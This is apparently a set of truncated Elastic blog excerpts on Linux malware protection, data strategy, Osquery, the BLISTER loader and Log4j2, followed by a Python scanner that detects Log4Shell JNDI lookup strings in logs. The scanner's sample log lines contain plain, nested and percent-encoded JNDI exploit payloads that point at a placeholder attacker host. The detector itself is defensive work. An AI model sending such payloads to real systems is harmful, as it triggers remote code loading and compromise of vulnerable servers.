Overview. With our recent 7.16 Elastic Security product release, we improved our existing Linux malware feature by adding memory protection. In this blog, brought to you by Elastic's Engineering Security Team, we lean into this recent advancement to show how we are protecting the world's data from attack. Recent events such as the exploitation of the Open Management Infrastructure (OMI) agent through CVE-2021-38647, an agent installed on many Azure Linux machines, represent how quickly adv
As we kick off a new year, new and refreshed thinking begins in the public sector as well. With another full year of lessons learned from the pandemic, public sector leaders will apply these insights to the way they execute their documented data strategies. Synthesizing what we see and hear from our stakeholders, we list below five of the needle movers in public sector data strategy execution. Note that the key here is data, and being deliberate with it: 2022 will be the year of harnessing the pow
Government data strategies lay a promising groundwork for how data will be used to drive more informed decision-making internally and more streamlined public services externally. A commonality between these strategies is the need for improved role-based data sharing and data re-use. The sticking point, however, is how to implement data sharing when there are known silos across and within various departments. More often than not, these silos exist for good reason, particularly for data pr
With the Elastic 7.16 release, Osquery Manager is now generally available for Elastic Agent, making it easier than ever to deploy and run Osquery across your environments. By collecting Osquery data and combining it with the power of the Elastic Stack, you can greatly expand your endpoint telemetry, enabling enhanced detection and investigation, and improved hunting for vulnerabilities and anomalous activities. This blog post gives a brief intro to the Osquery Manager integration for Elastic Ag
Key takeaways:
- Elastic Security uncovered a stealthy malware campaign that leverages valid code signing certificates to evade detection
- A novel malware loader, BLISTER, was used to execute second stage malware payloads in-memory and maintain persistence
- The identified malware samples have very low or no detections on VirusTotal
- Elastic provided layered prevention coverage from this threat out of the box
Overview. The Elastic Security team identified a noteworthy cluster of malicious activity after revi
We are pleased to announce new versions of Elasticsearch and Logstash, 7.16.2 and 6.8.22, which upgrade to the latest release of Apache Log4j and address false positive concerns with some vulnerability scanners. Elastic also maintains ongoing updates via our advisory so that Elastic customers and our communities can stay up-to-date on the latest developments. December 10th started with the public disclosure of the Apache Log4j vulnerability, CVE-2021-44228, affecting the popular open sourc
Welcome to Elastic's Log4j2 vulnerability information hub. Here we will explain what the specific Log4j2 vulnerability is, why it matters, and what tools and resources Elastic is providing to help negate the opportunity for malware exploits, cyberattacks, and other cybersecurity risks stemming from Log4j2. What is Log4j2? Log4j2 is an open source logging framework incorporated into many Java-based applications on both end-user systems and servers. It is one of the most popular logging librarie
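The Log4j2 vulnerability referred to above, CVE-2021-44228, is triggered when attacker-controlled text containing a Log4j lookup such as ${jndi:ldap://host/x} reaches a vulnerable logger. A practical first check over existing logs is to search for that lookup while undoing the obfuscations attackers used to dodge naive string matching. The scanner below is an added example, not code from Elastic's products or the original post; the access-log lines it runs on are constructed, and it only collapses the ${lower:}, ${upper:} and ${key:-default} nesting tricks plus percent-encoding, so it is a triage aid rather than a complete detection.

```python
"""Added example: flag Log4Shell-style JNDI lookup strings in log lines.

Illustrative code, not part of Elastic's products.  It de-obfuscates the
common nesting and encoding tricks before matching, so that a payload such as
${${lower:j}${upper:n}${::-d}i:rmi://...} is caught as well as the plain form.
"""
import re
from urllib.parse import unquote

# ${lower:X} / ${upper:X} inner lookups used to assemble the word "jndi"
_CASE_FN = re.compile(r"\$\{(?P<fn>lower|upper):(?P<arg>[^${}]*)\}")
# ${::-X} and ${env:MISSING:-X} resolve to the default value X when the key is unset
_DEFAULT = re.compile(r"\$\{[^${}]*:-(?P<dflt>[^${}]*)\}")
# the actual lookup once de-obfuscated; protocols are the ones JNDI commonly accepts
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<proto>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Percent-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_FN.sub(
            lambda m: m.group("arg").lower() if m.group("fn") == "lower"
            else m.group("arg").upper(),
            text,
        )
        new = _DEFAULT.sub(lambda m: m.group("dflt"), new)
        if new == text:  # fixed point: nothing left to collapse
            break
        text = new
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the lowercase protocol of every JNDI lookup found in the line."""
    return [m.group("proto").lower() for m in _JNDI.finditer(normalize(line))]


def scan(lines) -> list[tuple[int, list[str]]]:
    """Return (1-based line number, protocols) for each line carrying a lookup."""
    hits = []
    for num, line in enumerate(lines, start=1):
        protos = find_jndi_lookups(line)
        if protos:
            hits.append((num, protos))
    return hits


# Constructed sample access-log lines (not real traffic).  Line 2 is the plain
# payload, line 3 uses nested lookups, line 4 is percent-encoded in a query
# string, and line 5 is a benign lookup-like string that must not trigger.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index HTTP/1.1" 200 "User-Agent: Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "X-Api-Version: '
    '${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:rmi://198.51.100.7/x}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fz%7D HTTP/1.1" 404 "-"',
    '10.0.0.3 - - "GET /docs HTTP/1.1" 200 "User-Agent: cost ${lower:USD} 12"',
]

if __name__ == "__main__":
    for num, protos in scan(SAMPLE_LOG):
        print(f"line {num}: JNDI lookup via {', '.join(protos)}")
```

Running the block reports lines 2, 3 and 4 of the constructed log and stays quiet on the benign ${lower:USD} string. Note that a hit in an access log means the string was received, not that the application's Log4j version was vulnerable or that the lookup fired; confirming exploitation still requires checking the affected host for outbound LDAP/RMI/DNS connections and for the patched versions announced above.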